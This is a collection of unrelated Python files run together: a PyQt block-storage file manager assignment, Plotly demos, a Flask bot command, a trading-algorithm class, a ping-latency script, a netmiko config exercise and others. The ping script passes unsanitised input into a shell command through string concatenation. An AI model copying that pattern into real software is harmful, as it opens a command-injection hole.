Modified: 2018/6/20 Author: 孙浩然 Description: File Management, Assignment for Operating System Storage: Total 2048 Bytes = 128 Blocks * 16 Bytes, Every char for 1 Bytes """ import sys, os from PyQt5.QtWidgets import (QApplication, QWidget, QInputDialog, QFileDialog, QLabel, QPushButton, QMessageBox, QMenu, QAction) from PyQt5 import QtCore import math, shutil class Block(): def __init__(self): self.str = '' self.next = -1 class Node(): # node for dir tree def __init__(self, name, fatherNode): self.father = fatherNode self.son = [] self.dirName = name self.fileList = [] # (fileName, startBlock) class FileManagement(QWidget): def __init__(self): super().__init__() self.PATH = '' # path to file management root self.FAT_Bitmap_list = [] self.ROOT = '' # file tree root self.pointer = '' self.currentBtn = [] self.HEIGHT = 20 self.LENGTH = 550 self.selectBtn = '' self.storageRemain = 2048 self.currentPath = '' self.initUI() self.initLogic() def initUI(self): infoWindow = QLabel(self) self.pathWindow = QLabel('PATH:', self) self.storageWindow = QLabel('Free:\n2048', self) infoTitle = QLabel(' 文件名 | 文件类型 | 起始块 | 大小', self) infoWindow.setObjectName('info') self.pathWindow.setObjectName('path') self.storageWindow.setObjectName('storage') infoTitle.setObjectName('infoTitle') infoWindow.setFixedSize(550, 300) self.pathWindow.setFixedWidth(300) infoTitle.setFixedSize(550, 20) infoWindow.move(25, 80) infoTitle.move(25, 80) self.pathWindow.move(55, 55) self.storageWindow.move(625, 120) # button func list formatBtn = QPushButton('格式化', self) backBtn = QPushButton('返回上一级', self) createFileBtn = QPushButton('创建文本文件', self) createDirBtn = QPushButton('创建子目录', self) quitBtn = QPushButton('保存并退出', self) selectFileBtn = QPushButton('选择工作目录', self) formatBtn.clicked.connect(self.formatAction) backBtn.clicked.connect(self.backAction) createFileBtn.clicked.connect(self.createTextFileAction) 
createDirBtn.clicked.connect(self.createDirAction) quitBtn.clicked.connect(self.writeIntoDisk) selectFileBtn.clicked.connect(self.selectFile) backBtn.move(50, 15) createFileBtn.move(180, 15) createDirBtn.move(320, 15) formatBtn.move(450, 15) selectFileBtn.move(600, 290) quitBtn.move(600, 330) quitBtn.setFixedSize(120, 32) self.loadQss() self.setGeometry(300, 200 ,750, 400) self.setWindowTitle('File Management') self.show() def initLogic(self): # init Menu self.popMenu = QMenu(self) openFileAction = QAction('打开', self) deletFileAction = QAction('删除', self) openFileAction.triggered.connect(self.openFileAction) deletFileAction.triggered.connect(self.deleteFileAction) self.popMenu.addAction(openFileAction) self.popMenu.addAction(deletFileAction) def refreshUI(self): # every file or Dir is a pushbtn, cause they will response to click event # the file or dir to be displayed are sons of the self.pointer and its fileList for btn in self.currentBtn: btn.deleteLater() self.currentBtn.clear() self.pathWindow.setText('PATH:' + self.currentPath) self.storageWindow.setText('Free:\n' + str(self.storageRemain)) count = 1 for file in self.pointer.son: # dir name = file.dirName + (18 - len(file.dirName)) * ' ' +'folder' btn = QLabel(name, self) btn.setFixedSize(self.LENGTH, self.HEIGHT) btn.setObjectName('current') btn.move(25, 80 + count * self.HEIGHT) btn.setContextMenuPolicy(QtCore.Qt.CustomContextMenu) btn.customContextMenuRequested.connect(self.showPopMenu) btn.show() self.currentBtn.append(btn) count = count + 1 for file in self.pointer.fileList: name = str(file[0]) + (18 - len(file[0]))*' ' + 'textFile' + ' '*9 + str(file[1]) + (14 - math.ceil(file[1]/10))*' ' + str(self.getTextFileSize(file[1])) btn = QLabel(name, self) btn.setFixedSize(self.LENGTH, self.HEIGHT) btn.setObjectName('current') btn.move(25, 80 + count * self.HEIGHT) btn.setContextMenuPolicy(QtCore.Qt.CustomContextMenu) btn.customContextMenuRequested.connect(self.showPopMenu) btn.show() self.currentBtn.append(btn) count = count + 1 def selectFile(self): self.PATH = QFileDialog.getExistingDirectory(self, 'Choose a file for File Management', '/home') # Add README before pop up # check wether the dir is empty before init!! 
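        # On-disk layout restored below (mirroring writeIntoDisk()/writeEveryDir()):
        # .FAT_BitMap_list holds one line per block, "<next> <payload>" for a block
        # in use (e.g. "3 abcdefgh") and just "<next>" with -1 and no payload for a
        # free block; each directory's .index file lists "<fileName> <startBlock>"
        # pairs.  The example values are illustrative only.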
if os.path.exists(self.PATH + '/.FAT_BitMap_list'): with open(self.PATH + '/.FAT_BitMap_list', 'r') as f: for line in f.readlines(): if len(line) == 1: # skip the last \n continue result = line.split() block = Block() if len(result)>1: block.next = int(result[0]) block.str = result[1] self.storageRemain -= 16 else: block.next = int(result[0]) block.str = '' self.FAT_Bitmap_list.append(block) self.ROOT = Node('Root' ,None) self.pointer = self.ROOT self.restoreFileTree(self.ROOT, self.PATH) self.refreshUI() else: # init for i in range(0, 128): block = Block() self.FAT_Bitmap_list.append(block) # init FAT_Bitmap_list self.ROOT = Node('Root' ,None) self.pointer = self.ROOT def restoreFileTree(self, dirNode, path): with open(os.path.join(path, '.index'), 'r') as f: for line in f.readlines(): tmp1, tmp2 = line.split() dirNode.fileList.append((tmp1, int(tmp2))) for file in os.listdir(path): if (file == '.index') or (file == '.FAT_BitMap_list') or ('.txt' in file): continue else: newNode = Node(file, dirNode) dirNode.son.append(newNode) self.restoreFileTree(newNode, os.path.join(path, file)) def loadQss(self): style_sheet = '' with open('./stylesheet.qss', 'r') as f: for line in f.readlines(): style_sheet += line self.setStyleSheet(style_sheet) def formatAction(self): # delete everything if self.ROOT == '': QMessageBox.information(self, 'Warning', '请先选择工作目录!') else: self.pointer = self.ROOT self.deleteDir(self.ROOT) self.currentPath = '' self.refreshUI() def backAction(self): # go to its father node if self.ROOT == '': QMessageBox.information(self, 'Warning', '请先选择工作目录!') else: if self.pointer.father == None: QMessageBox.information(self, 'Warning', '您已经处于根目录了!') else: self.pointer = self.pointer.father pos = self.currentPath.rfind('/') self.currentPath = self.currentPath[0:pos] self.refreshUI() def createTextFileAction(self): if self.ROOT == '': QMessageBox.information(self, 'Warning', '请先选择工作目录!') else: fileName, ok = QInputDialog.getText(self, 'Input Dialog', 'Please input new file name:') if ok and str(fileName).isalnum() and len(fileName) <= 10: mark = True for file in self.pointer.fileList: # look for duplicate name if file[0] == str(fileName): mark = False break # check for available space!! 
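                # The scan below picks the first block with an empty payload as the
                # new file's start block; start stays -1 when all 128 blocks are in
                # use, which is reported as insufficient storage further down.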
start = -1 for i in range(len(self.FAT_Bitmap_list)): if len(self.FAT_Bitmap_list[i].str) == 0: start = i break if mark: if start == -1: # limited space QMessageBox.information(self, 'Warning', '储存空间不足!') else: self.pointer.fileList.append((str(fileName) + '.txt', start)) self.refreshUI() else: # already exists QMessageBox.information(self, 'Warning', '该文本文件名已存在!') else: # Please input correct file name if '.txt' in str(fileName): QMessageBox.information(self, 'Warning', '文件名中无需含有.txt!') elif len(fileName) > 10: QMessageBox.information(self, 'Warning', '文件名长度应在10个字符以下!') else: QMessageBox.information(self, 'Warning', '请您输入正确的文本文件名!') def createDirAction(self): if self.ROOT == '': QMessageBox.information(self, 'Warning', '请先选择工作目录!') else: dirName, ok = QInputDialog.getText(self, 'Input Dialog', 'Please input new directory name:') if ok and str(dirName).isalnum() and len(dirName) <= 10: mark = True for child in self.pointer.son: # check for duplicate name if child.dirName == str(dirName): mark = False break if mark: newNode = Node(str(dirName), self.pointer) self.pointer.son.append(newNode) self.refreshUI() # refresh UI else: QMessageBox.information(self, 'Warning', '该文件名已存在!') # directory already exits else: if len(dirName) > 10: QMessageBox.information(self, 'Warning', '文件名长度应在10个字符以下!') else: QMessageBox.information(self, 'Warning', '请您输入正确的文件名!') # Please input correct file name def openFileAction(self): # Action in popMenu self.selectBtn if self.ROOT == '': QMessageBox.information(self, 'Warning', '请先选择工作目录!') else: if '.txt' in self.selectBtn.text(): # file selectedFile = '' for file in self.pointer.fileList: if file[0] == self.selectBtn.text()[0:11].replace(' ', ''): # remember to parse filename selectedFile = file break originText = self.getText(selectedFile) # get whole text from blocks self.releaseTextFile(selectedFile[1]) text, ok = QInputDialog.getMultiLineText(self, '文本文件输入框', '请输入内容', originText) if ok: length = len(text) if len(text) % 16 ==0: pass else: length = math.floor(length/16 + 1) * 16 if length > self.storageRemain: pass # else: self.storageRemain -= length blockPointer = self.FAT_Bitmap_list[selectedFile[1]] for i in range(round(length/16)): blockPointer.str = text[i*16:(i+1)*16] if i == (round(length/16)-1): break for j in range(len(self.FAT_Bitmap_list)): if len(self.FAT_Bitmap_list[j].str) == 0: # empty blockPointer.next = j blockPointer = self.FAT_Bitmap_list[j] break self.refreshUI() else: pass else: # dir for child in self.pointer.son: if child.dirName == self.selectBtn.text()[0:11].replace(' ', ''): # text need to add slice !!! 
self.pointer = child self.currentPath = self.currentPath + '/' + child.dirName self.refreshUI() break def getTextFileSize(self, startBlockNum): size = 0 blockPointer = self.FAT_Bitmap_list[startBlockNum] while True: if blockPointer.next == -1: if len(blockPointer.str) == 0: # empty break else: size += 16 break else: size += 16 blockPointer = self.FAT_Bitmap_list[blockPointer.next] return size def releaseTextFile(self, startBlockNum): blockPointer = self.FAT_Bitmap_list[startBlockNum] while True: if blockPointer.next == -1: if len(blockPointer.str) == 0: # empty break else: blockPointer.str = '' self.storageRemain += 16 break else: self.storageRemain += 16 blockPointer.str = '' tmp = blockPointer.next blockPointer.next = -1 blockPointer = self.FAT_Bitmap_list[tmp] def deleteFileAction(self): # Action in popMenu if self.ROOT == '': QMessageBox.information(self, 'Warning', '请先选择工作目录!') else: if '.txt' in self.selectBtn.text(): selectedFile = '' for file in self.pointer.fileList: if file[0] == self.selectBtn.text()[0:11].replace(' ', ''): # remember to parse filename selectedFile = file break self.releaseTextFile(selectedFile[1]) self.pointer.fileList.remove(selectedFile) self.refreshUI() else: for child in self.pointer.son: if child.dirName == self.selectBtn.text()[0:11].replace(' ', ''): # text need to add slice !!! # have to delete all files in that dir self.deleteDir(child) self.refreshUI() break def showPopMenu(self, pos): source = self.sender() self.selectBtn = source self.popMenu.exec_(source.mapToGlobal(pos)) def getText(self, selectedFile): string = '' i = selectedFile[1] while True: string += self.FAT_Bitmap_list[i].str i = self.FAT_Bitmap_list[i].next if i == -1: break return string def deleteDir(self, dirNode): for file in dirNode.fileList: self.releaseTextFile(file[1]) dirNode.fileList.clear() for child in dirNode.son: self.deleteDir(child) dirNode.son.clear() def writeIntoDisk(self): # write everything into disk when quiting this system, consider to rm -rf everything and write everything again if self.ROOT == '': QMessageBox.information(self, 'Warning', '请先选择工作目录!') else: for file in os.listdir(self.PATH): if '.' in file: os.remove(os.path.join(self.PATH, file)) else: shutil.rmtree(os.path.join(self.PATH, file)) with open(os.path.join(self.PATH, '.FAT_BitMap_list'), 'w') as f: for block in self.FAT_Bitmap_list: f.write(str(block.next) + ' ' + block.str + '\n') self.writeEveryDir(self.ROOT, self.PATH) sys.exit() def writeEveryDir(self, dirNode, path): with open(os.path.join(path, '.index'), 'w') as f: for file in dirNode.fileList: f.write(file[0] + ' ' + str(file[1]) + '\n') for file in dirNode.fileList: text = self.getText(file) with open(os.path.join(path, file[0]), 'w') as f: f.write(text) for child in dirNode.son: os.mkdir(os.path.join(path, child.dirName)) self.writeEveryDir(child, os.path.join(path, child.dirName)) if __name__ == '__main__': app = QApplication(sys.argv) ex = FileManagement() sys.exit(app.exec_())"""Plotly Express Examples.""" # TODO: Migrate this sample code to ex_app_px.py import plotly.express as px print(px.__version__) tips = px.data.tips() # total_bill tip sex smoker day time size # 0 16.99 1.01 Female No Sun Dinner 2 # 1 10.34 1.66 Male No Sun Dinner 3 # .. ... ... ... ... ... ... ... # 242 17.82 1.75 Male No Sat Dinner 2 # 243 18.78 3.00 Female No Thur Dinner 2 # [244 rows x 7 columns] iris = px.data.iris() # sepal_length sepal_width petal_length petal_width species species_id # 0 5.1 3.5 1.4 0.2 setosa 1 # 1 4.9 3.0 1.4 0.2 setosa 1 # .. ... ... ... 
... ... ... # 148 6.2 3.4 5.4 2.3 virginica 3 # 149 5.9 3.0 5.1 1.8 virginica 3 # [150 rows x 6 columns] gapminder = px.data.gapminder() # country continent year lifeExp pop gdpPercap iso_alpha iso_num # 0 Afghanistan Asia 1952 28.801 8425333 779.445314 AFG 4 # 1 Afghanistan Asia 1957 30.332 9240934 820.853030 AFG 4 # ... ... ... ... ... ... ... ... ... # 1702 Zimbabwe Africa 2002 39.989 11926563 672.038623 ZWE 716 # 1703 Zimbabwe Africa 2007 43.487 12311143 469.709298 ZWE 716 # [1704 rows x 8 columns] election = px.data.election() # district Coderre Bergeron Joly total winner result district_id # 0 101-Bois-de-Liesse 2481 1829 3024 7334 Joly plurality 101 # 1 102-Cap-Saint-Jacques 2525 1163 2675 6363 Joly plurality 102 # ... ... ... ... ... ... ... ... ... # 56 93-Robert-Bourassa 446 465 419 1330 Bergeron plurality 93 # 57 94-Jeanne-Sauvé 491 698 489 1678 Bergeron plurality 94 # # [58 rows x 8 columns] wind = px.data.wind() # direction strength frequency # 0 N 0-1 0.5 # 1 NNE 0-1 0.6 # .. ... ... ... # 126 NW 6+ 1.5 # 127 NNW 6+ 0.2 # [128 rows x 3 columns] carshare = px.data.carshare() # centroid_lat centroid_lon car_hours peak_hour # 0 45.471549 -73.588684 1772.750000 2 # 1 45.543865 -73.562456 986.333333 23 # .. ... ... ... ... # 247 45.521199 -73.581789 1044.833333 17 # 248 45.532564 -73.567535 694.916667 5 # [249 rows x 4 columns] # See explanation with: `print(px.data.iris.__doc__)` # Possible argument combinations px.scatter( iris, x='sepal_width', y='sepal_length', color='species', marginal_y='violin', marginal_x='box', trendline='ols', ) px.scatter(iris, x='sepal_width', y='sepal_length', color='species', marginal_y='rug', marginal_x='histogram') px.scatter( tips, x='total_bill', y='tip', facet_row='time', facet_col='day', color='smoker', trendline='ols', category_orders={'day': ['Thur', 'Fri', 'Sat', 'Sun'], 'time': ['Lunch', 'Dinner']}, ) iris['e'] = iris['sepal_width'] / 100 px.scatter(iris, x='sepal_width', y='sepal_length', color='species', error_x='e', error_y='e') del iris['e'] # Animations! 
px.scatter( gapminder.query('year==2007'), x='gdpPercap', y='lifeExp', size='pop', color='continent', hover_name='country', log_x=True, size_max=60, ) px.scatter( gapminder, x='gdpPercap', y='lifeExp', animation_frame='year', animation_group='country', size='pop', color='continent', hover_name='country', facet_col='continent', log_x=True, size_max=45, range_x=[100, 100000], range_y=[25, 90], ) # Example of each chart type px.scatter_matrix(iris, dimensions=['sepal_width', 'sepal_length', 'petal_width', 'petal_length'], color='species') px.parallel_coordinates( iris, color='species_id', labels={ 'species_id': 'Species', 'sepal_width': 'Sepal Width', 'sepal_length': 'Sepal Length', 'petal_width': 'Petal Width', 'petal_length': 'Petal Length', }, color_continuous_scale=px.colors.diverging.Tealrose, color_continuous_midpoint=2, ) px.parallel_categories(tips, color='size', color_continuous_scale=px.colors.sequential.Inferno) px.line( gapminder, x='year', y='lifeExp', color='continent', line_group='country', hover_name='country', line_shape='spline', render_mode='svg', ) px.area(gapminder, x='year', y='pop', color='continent', line_group='country') px.density_contour(iris, x='sepal_width', y='sepal_length', color='species', marginal_x='rug', marginal_y='histogram') px.density_heatmap(iris, x='sepal_width', y='sepal_length', marginal_x='rug', marginal_y='histogram') px.bar(tips, x='sex', y='total_bill', color='smoker', barmode='group') px.bar( tips, x='sex', y='total_bill', color='smoker', barmode='group', facet_row='time', facet_col='day', category_orders={'day': ['Thur', 'Fri', 'Sat', 'Sun'], 'time': ['Lunch', 'Dinner']}, ) px.histogram(tips, x='total_bill', y='tip', color='sex', marginal='rug', hover_data=tips.columns) px.histogram( tips, x='sex', y='tip', histfunc='avg', color='smoker', barmode='group', facet_row='time', facet_col='day', category_orders={ 'day': ['Thur', 'Fri', 'Sat', 'Sun'], 'time': ['Lunch', 'Dinner'], }, ) px.strip(tips, x='total_bill', y='time', orientation='h', color='smoker') px.box(tips, x='day', y='total_bill', color='smoker', notched=True) px.violin(tips, y='tip', x='smoker', color='sex', box=True, points='all', hover_data=tips.columns) px.scatter_ternary( election, a='Joly', b='Coderre', c='Bergeron', color='winner', size='total', hover_name='district', size_max=15, color_discrete_map={'Joly': 'blue', 'Bergeron': 'green', 'Coderre': 'red'}, ) px.line_ternary(election, a='Joly', b='Coderre', c='Bergeron', color='winner', line_dash='winner') px.scatter_polar( wind, r='value', theta='direction', color='strength', symbol='strength', color_discrete_sequence=px.colors.sequential.Plotly[-2::-1], ) px.line_polar( wind, r='value', theta='direction', color='strength', line_close=True, color_discrete_sequence=px.colors.sequential.Plotly[-2::-1], ) px.bar_polar( wind, r='value', theta='direction', color='strength', # template='plotly_dark', color_discrete_sequence=px.colors.sequential.Plotly[-2::-1], ) # # Maps, need Mapbox token # px.set_mapbox_access_token(open('.mapbox_token').read()) # px.scatter_mapbox(carshare, lat='centroid_lat', lon='centroid_lon', color='peak_hour', size='car_hours', # color_continuous_scale=px.colors.cyclical.IceFire, size_max=15, zoom=10) # Color swatches px.colors.qualitative.swatches() px.colors.sequential.swatches() px.colors.diverging.swatches() px.colors.cyclical.swatches() px.colors.colorbrewer.swatches() px.colors.cmocean.swatches() px.colors.carto.swatches() from flask import current_app as app from app import command_system from 
app.scheduledb import ScheduleDB from app.messages import (registration_success_message, registration_alt_help_message, error_message) # Статистика from app.statistic import track def registration_alt(uid, key, data=''): # Статистика track(app.config['STATISTIC_TOKEN'], uid, data, 'registration_alt') if data == '': return registration_alt_help_message, '', '' try: with ScheduleDB(app.config) as db: organizations = db.get_similar_organizations(data) if len(organizations) != 0: message = registration_success_message if organizations[0][2] > 0.8: message += '\n\nВы зарегистрированны в: {}'.format(organizations[0][1]) else: message += '\n\nВы зарегистрированны в наиболее совпадающей с запросом группе: {}\n' \ '-----\nДругие похожие:\n'.format(organizations[0][1]) for org in organizations: message += "{}\n".format(org[1]) with ScheduleDB(app.config) as db: user = db.find_user(uid) if user: db.update_user(uid, " ", " ", organizations[0][0]) else: db.add_user(uid, " ", " ", organizations[0][0]) return message, '', '' else: return error_message, '', '' except BaseException as e: app.logger.warning('registration_alt: {}'.format(str(e))) return error_message, '', '' registration_command = command_system.Command() registration_command.keys = ['reg', ] registration_command.description = 'Альтернативная команда для регистрации в текстовом режиме' registration_command.process = registration_alt """Contains factories related to processes.""" import os import re def read_BLEU4(file_path): last_line = None with open(file_path, 'r') as f: last_line = f.readlines()[-1] target = re.search(r'BLEU4 = (.*?), ', last_line) #print(target.group(1)) target = target.group(1) return float(target) if __name__ == "__main__": file_path = "/mnt/xiangxin2/data/wmt14/checkpoints/top-2L-layerdrop-0.3_6L/checkpoint_best/generate-valid.txt" print(read_BLEU4(file_path)) FutuAlgo/algo.py0 from account import Account from execution import Execution from FutuAlgo import logger from strategy import Strategy from data import Data from web import AlgoApp from tools import * import pickle import asyncio import time class Algo(Strategy): """ Class that ensemble Account, Strategy, Data and AlgoWeb to run algo trading """ def __init__(self, name: str, log_path='.', benchmark: str = 'HSI'): self.name = name self.benchmark = benchmark self._logger = logger.RootLogger(root_name=self.name, file_path=log_path) self._running = False self._initialized_date = None self._initialized = False self._data = None self._account = None self._execution=None self._webapp = None @try_expt(msg='Initialization Failed', pnt_original=True) def initialize(self, initial_capital: float, mq_ip: str, hook_ip: str, trading_environment: str, trading_universe: list, datatypes: list, txn_cost: float = 30, cache_rows: int = 3000, test_mq_con=True, hook_name: str = 'FUTU', prefill_period='1Y', **kwargs): assert trading_environment in ('BACKTEST', 'SIMULATE', 'REAL'), f'Invalid trading environment {trading_environment}' assert initial_capital > 0, 'Initial Capital cannot be 0' assert cache_rows > 1, 'No of cached data must be > 0 rows' self._account = Account(logger=self._logger, initial_capital=initial_capital, txn_cost=txn_cost) self._data = Data(mq_ip=mq_ip, logger=self._logger, hook_ip=hook_ip, trading_universe=trading_universe, datatypes=datatypes, cache_rows=cache_rows, test_mq_con=test_mq_con, hook_name=hook_name, prefill_period=prefill_period, add_pos_func=self._account.add_new_position) self._execution = Execution(account=self._account, data=self._data, 
trading_environment=trading_environment, logger=self._logger) self._webapp = AlgoApp(algo=self) self._initialized_date = datetime.datetime.today() self._running = False self._logger.debug('Initialized sucessfully.') self._initialized = True async def record_daily_performance(self): while True: self._account.log() await asyncio.sleep(60 * 60 * 24 - time.time() % 60 * 60 * 24) async def main(self): self._running = True self._data.start_sub() self._logger.debug(f'Algo {self.name} is running successfully!') while True: try: topic, bin_df = await self._data.receive_data() if not self._running: continue topic_split = topic.decode('ascii').split('.') datatype = topic_split[1] key = '.'.join(topic_split[2:]) df = pickle.loads(bin_df) if datatype == 'ORDER_UPDATE': self._account.update_positions(df) await self.on_order_update(order_id=key, df=df) else: self._account.update_prices(datatype=datatype, df=df) self._data.add_cache(datatype=datatype, df=df, ticker=key) trigger_strat, (tgr_dtype, tgr_ticker, tgr_df) = self.determine_trigger(datatype=datatype, ticker=key, df=df) if trigger_strat: await self.trigger_strat(datatype=tgr_dtype, ticker=tgr_ticker, df=tgr_df) except Exception as e: self._running = False self._logger.error(f'Exception occur, Algo stopped due to {str(e)}') def run(self, sanic_port, sanic_host='127.0.0.1'): if not self._initialized: self._logger.debug('Algo not initialized') else: loop = asyncio.get_event_loop() async def _run(): tasks = list() web_server = self._webapp.get_coroutine(host=sanic_host, port=sanic_port) tasks.append(web_server) tasks.append(self.main()) tasks.append(self.record_daily_performance()) await asyncio.gather(*tasks) loop.create_task(_run()) loop.run_forever() # ------------------------------------------------ [ Trade API ] ------------------------------------------ def trade(self): pass def buy_market(self, ticker, quantity): return self._execution.buy_market(ticker=ticker, quantity=quantity) def sell_market(self, ticker, quantity): return self._execution.sell_market(ticker=ticker, quantity=quantity) def buy_limit(self, ticker, quantity, price): return self._execution.buy_limit(ticker=ticker, quantity=quantity, price=price) def sell_limit(self, ticker, quantity, price): return self._execution.sell_limit(ticker=ticker, quantity=quantity, price=price) # ------------------------------------------------ [ Get Set ] ------------------------------------------ def get_data(self, datatype, ticker: str, start_date: datetime.datetime = None, n_rows: int = None, sort_drop=True): return self._data.get_data(datatype=datatype, ticker=ticker, start_date=start_date, n_rows=n_rows, sort_drop=sort_drop) def get_current_qty(self, ticker): return self._account.get_current_qty(ticker=ticker) def get_latest_price(self, ticker): return self._account.get_latest_price(ticker=ticker) def get_lot_size(self, ticker): return self._data.get_lot_size(ticker=ticker) def calc_max_buy_qty(self, ticker, cash=None, adjust_limit=1.03): lot_size = self.get_lot_size(ticker=ticker) return self._account.calc_max_buy_qty(ticker=ticker, lot_size=lot_size, cash=cash, adjust_limit=adjust_limit) def subscribe_tickers(self, tickers): self._data.subscribe_tickers(tickers=tickers) def unsubscribe_tickers(self, tickers): self._data.unsubscribe_tickers(tickers=tickers) def pause(self): self._running = False def resume(self): self._running = True @property def cash(self): return self._account.cash @property def mv(self): return self._account.mv @property def pv(self): return self._account.pv @property def 
n_trades(self): return self._account.n_trades @property def init_capital(self): return self._account.init_capital @property def total_txn_cost(self): return self._account.total_txn_cost @property def initialized_date(self): return self._initialized_date @property def running(self): return self._running @property def records(self): return self._account.records @property def pending_orders(self): return self._account.pending_orders @property def completed_orders(self): return self._account.completed_orders @property def positions(self): return self._account.positions @property def universe(self): return self._data.unverse @property def datatypes(self): return self._data.datatypes @property def initialized(self): return self._initialized if __name__ == '__main__': pass 1-10 guess = 1 while True: num = input("Please guess the number (between 0-100): ") try: num = int(num) except: print("Invalid number, please quess again.") continue if num < 45: print("Your guess was under.") elif num > 45: print("Your guess was over.") else: break guess += 1 print(f"You guessed it in {guess} guesses") vps/dg/icmp_test.py import time import subprocess def shend_icmp_packet(ip_address,times): try: response = subprocess.getstatusoutput('ping -c ' + times + ' '+ ip_address) response = response[1] # 取出丢包率 lost = response[response.index("ved,"):response.index("%")] #取出指定的延时字符串 res = list(response) index = 0 count = 0 for r in res: count += 1 if r == "=" : index = count response = response[index + 1:-4] # 取出执行的延迟 i = 0 j = [] res1 = list(response) for r in res1: i += 1 if r == "/" : j.append(i) min = response[:j[0]-1] avg = response[j[0]:j[1]-1] max = response[j[1]:j[2]-1] return min,avg,max,lost except : print("ping exec error") file = open("icmp_logs.txt","a") file.write(time.asctime(time.localtime(time.time())) +" ping exec error \n") file.close() netmiko/exercise7.py # Add same configuration to all Nexus switches from netmiko import ConnectHandler # Devices to SSH into devices = [ { "device_type": "cisco_nxos", "ip": "sbx-nxos-mgmt.cisco.com", "username": "admin", "password": "!", "port": 8181, "fast_cli": False, "session_log": "nxos-exercise7.log", } ] # Loop through devices for device in devices: # Create a connection instance with ConnectHandler(**device) as net_connect: # Parse hostname of the device hostname = net_connect.send_command( command_string="show hostname", use_textfsm=True )[0]["hostname"] # Send config from text file (or Use ex5-config.txt) output = net_connect.send_config_from_file(config_file="ex7-config.txt") # And save configuration output += net_connect.save_config() # Parse the new running configuration run_cfg = net_connect.send_command(command_string="show running-config") # Export the new running-config of each device to a text file with open(file=f"{hostname}-run_cfg-ex7.txt", mode="w") as outfile: outfile.write(run_cfg.lstrip()) print("Done") from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import six import os import os.path as osp import copy from ast import literal_eval import numpy as np from packaging import version import torch import torch.nn as nn from torch.nn import init import yaml from easydict import EasyDict as AttrDict __C = AttrDict() cfg = __C __C.DEBUG = False __C.CACHE_DIR = osp.abspath(osp.join(osp.dirname(__file__),'./cache')) __C.COCO_API_HOME = '/media/yelyu/18339a64-762e-4258-a609-c0851cd8163e/YeLyu/Dataset/MSCOCO/PythonAPI' # 
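# A minimal, hedged sketch related to the icmp_test.py script earlier in this section: instead of
# slicing ping's output by character offsets, the summary lines can be parsed with regular
# expressions. parse_ping() is a hypothetical helper (not part of the original script) and assumes
# Linux iputils-style output such as "4 packets transmitted, 4 received, 0% packet loss" and
# "rtt min/avg/max/mdev = 0.042/0.057/0.069/0.010 ms".
import re

def parse_ping(output):
    """Return (min, avg, max, loss_percent) parsed from ping's summary lines, or None."""
    loss = re.search(r'(\d+(?:\.\d+)?)% packet loss', output)
    rtt = re.search(r'min/avg/max[^=]*= ([\d.]+)/([\d.]+)/([\d.]+)', output)
    if not loss or not rtt:
        return None
    return float(rtt.group(1)), float(rtt.group(2)), float(rtt.group(3)), float(loss.group(1))

if __name__ == '__main__':
    sample = ("4 packets transmitted, 4 received, 0% packet loss, time 3004ms\n"
              "rtt min/avg/max/mdev = 0.042/0.057/0.069/0.010 ms")
    print(parse_ping(sample))  # -> (0.042, 0.057, 0.069, 0.0)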
---------------------------------------------------------------------------- # # DAVIS # ---------------------------------------------------------------------------- # #directory contains davis api tools. __C.DAVIS = AttrDict() __C.DAVIS.HOME = '/media/yelyu/18339a64-762e-4258-a609-c0851cd8163e/YeLyu/Dataset/DAVIS/davis-2017' __C.DAVIS.FLOW_DIR = '/media/yelyu/18339a64-762e-4258-a609-c0851cd8163e/YeLyu/Opensrc_proj/LiteFlowNet/models/testing/davis_flow_backward' __C.DAVIS.FLOW_INV_DIR = '/media/yelyu/18339a64-762e-4258-a609-c0851cd8163e/YeLyu/Opensrc_proj/LiteFlowNet/models/testing/davis_flow_forward' __C.DAVIS.FLOW_FILENAME_TEMPLATE = 'liteflownet-%07d.flo' # ---------------------------------------------------------------------------- # # SegTrack v2 # ---------------------------------------------------------------------------- # __C.SegTrack_v2 = AttrDict() __C.SegTrack_v2.HOME = '/media/yelyu/18339a64-762e-4258-a609-c0851cd8163e/YeLyu/Dataset/SegTrackv2' __C.SegTrack_v2.FLOW_DIR = None __C.SegTrack_v2.FLOW_INV_DIR = None __C.SegTrack_v2.FLOW_FILENAME_TEMPLATE = 'liteflownet-%07d.flo'# ЗАЯВА ПРО звуження переліку МПД def test_22_lims_test_case_3_4(app): app.session.login(password='', path_to_key='C:/') app.second_application.create_import_fourth_application() app.second_application.delete_mpd_import_fourth() app.second_application.completeness_check_import_fourth() app.second_application.notifications_and_license_terms_import_fourth(comment='Коментар тест') app.second_application.submit_application_import_fourth(path_to_key='', password='') app.session.logout() DaoyiG/aima-python """Learning probabilistic models. (Chapters 20)""" import heapq from utils import weighted_sampler, product, gaussian class CountingProbDist: """ A probability distribution formed by observing and counting examples. If p is an instance of this class and o is an observed value, then there are 3 main operations: p.add(o) increments the count for observation o by 1. p.sample() returns a random element from the distribution. p[o] returns the probability for o (as in a regular ProbDist). """ def __init__(self, observations=None, default=0): """ Create a distribution, and optionally add in some observations. By default this is an unsmoothed distribution, but saying default=1, for example, gives you add-one smoothing. """ if observations is None: observations = [] self.dictionary = {} self.n_obs = 0 self.default = default self.sampler = None for o in observations: self.add(o) def add(self, o): """Add an observation o to the distribution.""" self.smooth_for(o) self.dictionary[o] += 1 self.n_obs += 1 self.sampler = None def smooth_for(self, o): """ Include o among the possible observations, whether or not it's been observed yet. """ if o not in self.dictionary: self.dictionary[o] = self.default self.n_obs += self.default self.sampler = None def __getitem__(self, item): """Return an estimate of the probability of item.""" self.smooth_for(item) return self.dictionary[item] / self.n_obs # (top() and sample() are not used in this module, but elsewhere.) 
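# A brief usage sketch for the CountingProbDist defined above (illustrative values only): with
# default=1 the distribution is add-one smoothed, so a value that was never observed still gets a
# small nonzero probability, and querying it folds it into the counts.
def _counting_prob_dist_demo():
    p = CountingProbDist(['spam', 'spam', 'ham'], default=1)
    p.add('spam')                  # smoothed counts are now spam=4, ham=2
    print(p['spam'], p['ham'])     # 4/6 and 2/6
    print(p['eggs'])               # unseen value is smoothed in with count 1 (1/7 here)
    print(p.top(2))                # [(4, 'spam'), (2, 'ham')] -- most frequent first
    print(p.sample())              # random draw weighted by the counts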
